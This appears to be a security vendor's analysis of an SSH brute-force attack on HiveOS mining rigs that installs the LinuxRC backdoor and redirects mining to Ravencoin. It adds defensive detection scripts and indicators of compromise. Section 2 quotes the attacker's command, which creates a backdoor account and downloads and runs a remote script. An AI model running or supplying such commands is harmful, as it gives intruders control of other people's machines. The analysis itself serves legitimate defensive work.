Analysis of an Attack Against HiveOS for Mining Ravencoin

AhnLab SEcurity intelligence Center (ASEC) operates multiple honeypots to monitor attacks against poorly managed Linux servers. One of the most active of these is an SSH service configured with weak credentials, which is targeted by many DDoS and CoinMiner attackers.

While monitoring these external attacks, ASEC recently identified one targeting HiveOS. Initial access was gained through a poorly managed SSH service; the attacker then ran commands that switch the rig to mining a cryptocurrency of the attacker's choosing and additionally installed the LinuxRC backdoor.


1. HiveOS

HiveOS is an operating system dedicated to cryptocurrency mining, used for efficiently managing and monitoring multiple mining rigs. It can be used to automate and optimize cryptocurrency mining tasks.

Like other Linux servers, systems running HiveOS can also become targets of attacks if improperly managed. Especially when using SSH services for remote management, it becomes a target for brute force and dictionary attacks. Attacks targeting HiveOS have been ongoing for several years, with most involving the creation of SSH backdoor accounts. However, a new type of attack has recently been identified.


2. Initial Access

The attacker scanned for publicly exposed SSH services and attempted to log in by brute force. After a successful login, the following commands were executed to add a “hive” account whose password hash was generated with openssl passwd using a fixed salt. The command then downloads a malicious Bash script named “run” from an external server and executes it.

# sudo useradd -p `openssl passwd -1 -salt 'salt' IB223lW2` hive -u 1000 -o -g user -G user; sudo wget hxxp://are.cloudns[.]org:12300/hfs/run -O /tmp/run; sudo dos2unix /tmp/run; sudo chmod 777 /tmp/run; sudo /bin/bash /tmp/run
# openssl passwd -1 -salt salt IB223lW2
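Two traits of this useradd command are cheap for a defender to hunt for: “-u 1000 -o” creates the “hive” account with the same UID as the existing “user” account that “-g user” refers to, and “openssl passwd -1” produces a legacy MD5-crypt hash that current distributions no longer generate for regular accounts. The shell script below is an added example written for this post, not code from the post or from the attacker; it defines the two checks and runs them against constructed passwd and shadow samples (placeholder hashes) that stand in for /etc/passwd and /etc/shadow on a real host.

```shell
#!/bin/sh
# Added example (defender-side checks; not code from the ASEC post or from the
# attacker's script). The useradd command above passes "-u 1000 -o", so the
# backdoor "hive" account shares UID 1000 with the existing "user" account and
# is indistinguishable from it at the file-ownership level. Its password is an
# MD5-crypt hash (openssl passwd -1), a legacy format current distributions do
# not generate for regular accounts. Both traits stand out in passwd/shadow.

find_duplicate_uids() {
    # $1 = passwd-format file (use /etc/passwd on a real host)
    # Prints one line per UID that is shared by more than one account.
    awk -F: '
        {
            if ($3 in names) names[$3] = names[$3] " " $1; else names[$3] = $1
            count[$3]++
        }
        END {
            for (uid in count)
                if (count[uid] > 1) print "uid " uid " shared by: " names[uid]
        }
    ' "$1" | sort
}

find_md5crypt_hashes() {
    # $1 = shadow-format file (use /etc/shadow on a real host, as root)
    # Prints the accounts whose hash uses the legacy $1$ (MD5-crypt) format,
    # which is exactly what "openssl passwd -1" emits.
    awk -F: '$2 ~ /^[$]1[$]/ { print $1 }' "$1"
}

# Constructed sample files modelled on a host after the attacker's useradd:
# "user" is the pre-existing account, "hive" the added backdoor account.
# The hash strings are placeholders, not real password hashes.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
user:x:1000:1000:user:/home/user:/bin/bash
hive:x:1000:1000::/home/hive:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
EOF
cat > "$SAMPLE_DIR/shadow" <<'EOF'
root:$6$CONSTRUCTEDsalt$CONSTRUCTEDsha512hash:19900:0:99999:7:::
user:$6$CONSTRUCTEDsalt$CONSTRUCTEDsha512hash:19900:0:99999:7:::
hive:$1$salt$CONSTRUCTEDmd5crypthash:19900:0:99999:7:::
nobody:*:19900:0:99999:7:::
EOF

find_duplicate_uids "$SAMPLE_DIR/passwd"      # uid 1000 shared by: user hive
find_md5crypt_hashes "$SAMPLE_DIR/shadow"     # hive
```

On a real rig both checks should print nothing; any output is worth a look even if the account name is not “hive”, since the name is trivially changed while the duplicate-UID trick and the hash format are properties of the technique.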


3. Bash Script (run)

The initially executed “run” script is responsible for creating a backdoor account and installing additional payloads. First, it changes the passwords for the “hive” and “user” accounts using the following commands. It then overwrites the “authorized_keys” file with a new SSH public key.

Figure 1. Command for creating a backdoor account

Logging in to a Linux server over SSH can use either a password or an SSH key; with a key, no password needs to be entered. An SSH key pair (a public key and a private key) is generated for this purpose, and the public key is installed on the server. Afterwards, the matching private key allows the client to log in to the server without a password. In other words, through the step above, the threat actor can use the private key paired with the installed public key to log in to the compromised system.

Next, a backdoor named “autofan” and a service configuration file named “autofan.service” are downloaded, and the backdoor is registered as a service. Likewise, a malicious Bash script named “nvidia-conf”, which is responsible for the mining function, and a service configuration file named “overclock.service” are downloaded and registered as a service. Once these steps are complete, the script deletes multiple log files.
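Two audits for the persistence the “run” script leaves behind, as an added example that is not code from the post: unknown SSH keys in authorized_keys compared against an operator-maintained allowlist, and systemd unit files whose ExecStart points into /tmp, /var/tmp, /dev/shm or /home. The key strings, unit contents and install paths are constructed samples; the post does not state where the attacker places autofan or nvidia-conf.

```shell
#!/bin/sh
# Added example (defender-side checks; not from the ASEC post). The "run"
# script leaves two persistence artefacts that are easy to audit: an
# overwritten authorized_keys file and two new systemd services
# (autofan.service, overclock.service). unknown_authorized_keys prints keys
# that are not on an operator-maintained allowlist, comparing key type and
# key material only so that an edited comment cannot hide a key.
# suspicious_units prints unit files whose ExecStart points into a directory
# no packaged service would use. All paths and key strings below are
# constructed samples; the post does not give the attacker's install paths.

unknown_authorized_keys() {
    # $1 = authorized_keys to inspect, $2 = allowlist in authorized_keys format
    awk '
        # return "<type> <base64>" for a key line, skipping any leading options
        function keyid(    i) {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) return $i " " $(i + 1)
            return ""
        }
        /^[ \t]*(#|$)/ { next }
        FILENAME == ARGV[1] { k = keyid(); if (k != "") ok[k] = 1; next }
        { k = keyid(); if (k != "" && !(k in ok)) print k }
    ' "$2" "$1"
}

suspicious_units() {
    # $1 = directory of .service files (e.g. /etc/systemd/system on a real host)
    # Prints "<unit>: <ExecStart line>" when the binary lives under /tmp,
    # /var/tmp, /dev/shm or /home.
    for unit in "$1"/*.service; do
        [ -f "$unit" ] || continue
        if grep -Eq '^ExecStart=[-@+!]*(/tmp|/var/tmp|/dev/shm|/home)(/|$)' "$unit"; then
            printf '%s: %s\n' "$(basename "$unit")" "$(grep -E '^ExecStart=' "$unit" | head -n 1)"
        fi
    done
}

# Constructed sample data: one operator key, one key the script added, and
# three unit files, two of which reuse the names seen in this attack.
SAMPLE_DIR=$(mktemp -d)
mkdir "$SAMPLE_DIR/units"
cat > "$SAMPLE_DIR/allowlist" <<'EOF'
ssh-ed25519 AAAAconstructedOperatorKey admin@ops
EOF
cat > "$SAMPLE_DIR/authorized_keys" <<'EOF'
ssh-ed25519 AAAAconstructedOperatorKey admin@ops
ssh-rsa AAAAconstructedAttackerKey hive
EOF
cat > "$SAMPLE_DIR/units/autofan.service" <<'EOF'
[Service]
ExecStart=/home/user/.autofan/autofan
EOF
cat > "$SAMPLE_DIR/units/overclock.service" <<'EOF'
[Service]
ExecStart=/tmp/nvidia-conf
EOF
cat > "$SAMPLE_DIR/units/example-agent.service" <<'EOF'
[Service]
ExecStart=/usr/bin/example-agent
EOF

unknown_authorized_keys "$SAMPLE_DIR/authorized_keys" "$SAMPLE_DIR/allowlist"
# ssh-rsa AAAAconstructedAttackerKey
suspicious_units "$SAMPLE_DIR/units"
# autofan.service: ExecStart=/home/user/.autofan/autofan
# overclock.service: ExecStart=/tmp/nvidia-conf
```

Because the script also deletes log files, these file-state checks are more reliable after the fact than auth logs; running them from a cron job on each rig and alerting on any output gives a simple integrity monitor for both artefacts.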


4. LinuxRC Backdoor

“Autofan” is a LinuxRC backdoor developed by “im_bill”, and its source code is available on GitHub. While it is not a well-known open-source backdoor, it has a history of being used alongside Mirai in a Spring4Shell attack case disclosed by China’s “360 Netlab” in 2022. [1]

Figure 3. GitHub Page of LinuxRC

LinuxRC is a simple backdoor that supports file browsing, downloading/uploading, command execution, and a reverse shell. Although the attacker can already control the compromised system over SSH, LinuxRC provides an easier way to perform remote control, including file operations.

Command    Function
--------   ----------------------------------
CMDSHELL   Run command
SHELL2     Run command (interactive shell)
BACKDOOR   Reverse shell to the given address
EXPLORER   Browse files and directories
DOWNLOAD   Download files
UPLOAD     Upload files
OFFLINE    Terminate

Table 1. LinuxRC commands


5. Ravencoin Mining

In addition to LinuxRC, the downloader Bash script also installed another malicious Bash script named “nvidia-conf”. It is responsible for setting HiveOS’s miner to GMiner and downloading the attacker’s wallet file, as shown below. Note that because GMiner is already bundled with HiveOS, only the wallet file is replaced. As a result, the infected HiveOS system mines the coin specified by the attacker.

Figure 5. HiveOS’s miner configuration routine

Typically, CoinMiners targeting Linux servers install XMRig to mine Monero. The CoinMiner targeting HiveOS identified in this case, however, is characterized by mining Ravencoin. Ravencoin is a Bitcoin-based cryptocurrency and blockchain platform specialized in asset transfer and management. The downloaded wallet file “wallet.conf”, shown below, sets the mining algorithm to KawPow, the algorithm used by Ravencoin, along with the mining pool address and wallet address chosen by the attacker.

### FLIGHT SHEET "nicehash" ###

# Miner gminer
GMINER_ALGO="kawpow"
GMINER_TEMPLATE="NHba7cu4BYSU15YW1i6amYj9rUsf1SG7NU7r.rig_def"
GMINER_HOST="kawpow.auto.nicehash[.]com"
GMINER_PORT="9200"
GMINER_PASS="x"

META='{"fs_id":17495019,"gminer":{"coin":"Nicehash-KawPow"}}'
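Since GMiner ships with HiveOS and the attacker only had to swap the flight sheet, comparing the live wallet.conf against the values the rig owner actually configured catches this kind of cryptojacking regardless of which miner binary is in use. The script below is an added example, not code from the post: it reads KEY="value" lines from a HiveOS-style config and reports every field that differs from the expected values. The attacker’s wallet.conf above is reproduced as the observed file (pool domain kept defanged); the expected wallet and pool host are placeholders for the rig owner’s own settings.

```shell
#!/bin/sh
# Added example (defender-side check; not from the ASEC post). Because GMiner
# ships with HiveOS, the only thing the attacker had to change was the flight
# sheet: wallet template, pool host and algorithm. Comparing the live values
# against what the rig owner configured therefore catches this wallet swap.
# conf_value reads one KEY="value" line from a HiveOS-style config;
# wallet_drift prints every field that differs from the expected values.
# The "expected" values are placeholders for the rig owner's own settings;
# the observed file reproduces the attacker's wallet.conf shown in the post.

conf_value() {
    # $1 = config file, $2 = key; prints the value with surrounding quotes removed
    awk -F= -v key="$2" '
        $1 == key {
            v = substr($0, length(key) + 2)
            gsub(/^"|"$/, "", v)
            print v
            exit
        }' "$1"
}

wallet_drift() {
    # $1 = config to check; $2 = expected algorithm; $3 = expected wallet
    # template ("wallet.worker"); $4 = expected pool host
    for pair in "GMINER_ALGO=$2" "GMINER_TEMPLATE=$3" "GMINER_HOST=$4"; do
        key=${pair%%=*}
        expected=${pair#*=}
        actual=$(conf_value "$1" "$key")
        [ "$actual" = "$expected" ] ||
            printf '%s: expected "%s", found "%s"\n' "$key" "$expected" "$actual"
    done
}

# Observed file: the attacker's wallet.conf from the post, pool domain defanged.
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/wallet.conf" <<'EOF'
### FLIGHT SHEET "nicehash" ###

# Miner gminer
GMINER_ALGO="kawpow"
GMINER_TEMPLATE="NHba7cu4BYSU15YW1i6amYj9rUsf1SG7NU7r.rig_def"
GMINER_HOST="kawpow.auto.nicehash[.]com"
GMINER_PORT="9200"
GMINER_PASS="x"

META='{"fs_id":17495019,"gminer":{"coin":"Nicehash-KawPow"}}'
EOF

# Placeholder values standing in for the rig owner's own flight sheet.
EXPECTED_ALGO="kawpow"
EXPECTED_TEMPLATE="RVN_OPERATOR_WALLET_PLACEHOLDER.rig01"
EXPECTED_HOST="rvn.pool.example.invalid"

wallet_drift "$SAMPLE_DIR/wallet.conf" "$EXPECTED_ALGO" "$EXPECTED_TEMPLATE" "$EXPECTED_HOST"
# GMINER_TEMPLATE: expected "RVN_OPERATOR_WALLET_PLACEHOLDER.rig01", found "NHba7cu4BYSU15YW1i6amYj9rUsf1SG7NU7r.rig_def"
# GMINER_HOST: expected "rvn.pool.example.invalid", found "kawpow.auto.nicehash[.]com"
```

The algorithm matches in this sample because the placeholder owner also mines Ravencoin, which is the point of checking the wallet and pool rather than only the coin: a swapped wallet on the same algorithm shows no change in hashrate or GPU load, so the config itself is the signal.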


6. Conclusion

Cryptojacking attacks against poorly managed HiveOS servers have recently been observed. HiveOS, an operating system dedicated to cryptocurrency mining, became a target because its SSH service, used for remote management, was running with weak account credentials. After initial access, the attacker reconfigured the system to mine Ravencoin and also installed the LinuxRC backdoor.

For this reason, administrators should use passwords that are hard to guess and change them periodically to protect Linux servers from brute force and dictionary attacks, and should apply the latest patches to prevent attacks that exploit vulnerabilities. Administrators should also place servers that are reachable from the outside behind security products such as firewalls to restrict access by threat actors. Lastly, V3 should be updated to the latest version to block malware infections in advance.
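A concrete form of the SSH recommendation above, as an added example that is not part of the post: a small audit of sshd_config that reports the directives enabling password guessing, run against a constructed weak configuration and a constructed key-only one. The AllowUsers entry is a placeholder for the rig’s actual administrative account.

```shell
#!/bin/sh
# Added example (not from the ASEC post): an audit of the sshd settings that
# make the brute-force entry point described above possible. sshd_weak_settings
# prints one line per risky directive in an sshd_config file, and also flags
# a missing PasswordAuthentication line because OpenSSH defaults it to "yes".
# The two configs below are constructed samples: the first is what an
# exposed rig typically runs, the second a key-only setup that removes the
# password-guessing attack surface (AllowUsers is a placeholder).

sshd_weak_settings() {
    # $1 = sshd_config to inspect (use /etc/ssh/sshd_config on a real host)
    awk '
        /^[ \t]*(#|$)/ || NF < 2 { next }
        { key = tolower($1); val = tolower($2) }
        key == "passwordauthentication" { seen_pw = 1 }
        key == "passwordauthentication" && val == "yes" { print "PasswordAuthentication yes: password guessing over SSH is possible" }
        key == "permitrootlogin" && val == "yes" { print "PermitRootLogin yes: root is exposed to guessing directly" }
        key == "permitemptypasswords" && val == "yes" { print "PermitEmptyPasswords yes: accounts without a password can log in" }
        END { if (!seen_pw) print "PasswordAuthentication not set: OpenSSH defaults to yes" }
    ' "$1"
}

SAMPLE_DIR=$(mktemp -d)
# Weak: passwords accepted, root may log in directly.
cat > "$SAMPLE_DIR/sshd_config.weak" <<'EOF'
Port 22
PermitRootLogin yes
PasswordAuthentication yes
EOF
# Hardened: key-based logins only, no root login, a short retry budget,
# and an explicit list of accounts allowed to log in (placeholder name).
cat > "$SAMPLE_DIR/sshd_config.hardened" <<'EOF'
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
AllowUsers user
EOF

sshd_weak_settings "$SAMPLE_DIR/sshd_config.weak"
# PermitRootLogin yes: root is exposed to guessing directly
# PasswordAuthentication yes: password guessing over SSH is possible
sshd_weak_settings "$SAMPLE_DIR/sshd_config.hardened"
# (no output)
```

Key-only authentication removes the credential-guessing entry point, but as this case shows, the attacker’s next step after getting in is to install their own key, so the authorized_keys file still needs to be monitored alongside the sshd configuration.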


File Detection

– Downloader/BASH.Miner (2024.09.20.02)
– Backdoor/Linux.Shell.23272 (2024.09.20.02)
– Downloader/BASH.Miner.SC204555 (2024.09.20.02)
– Data/BIN.Config (2024.10.06.03)


MD5

1453e39da61777e617ff2da815905c63
2d24ab3191541c45a12bde89ea12478f
8a6ca9c05e1849522f993ce48af1ee6d
e609138ef098be4a6f874f54ca565d19

URL

http[:]//are[.]cloudns[.]org[:]12300/hfs/miners/autofan
http[:]//are[.]cloudns[.]org[:]12300/hfs/miners/autofan[.]service
http[:]//are[.]cloudns[.]org[:]12300/hfs/nvidia-conf-delay
http[:]//are[.]cloudns[.]org[:]12300/hfs/overclock[.]service
http[:]//are[.]cloudns[.]org[:]12300/hfs/run

IP

222[.]103[.]211[.]25
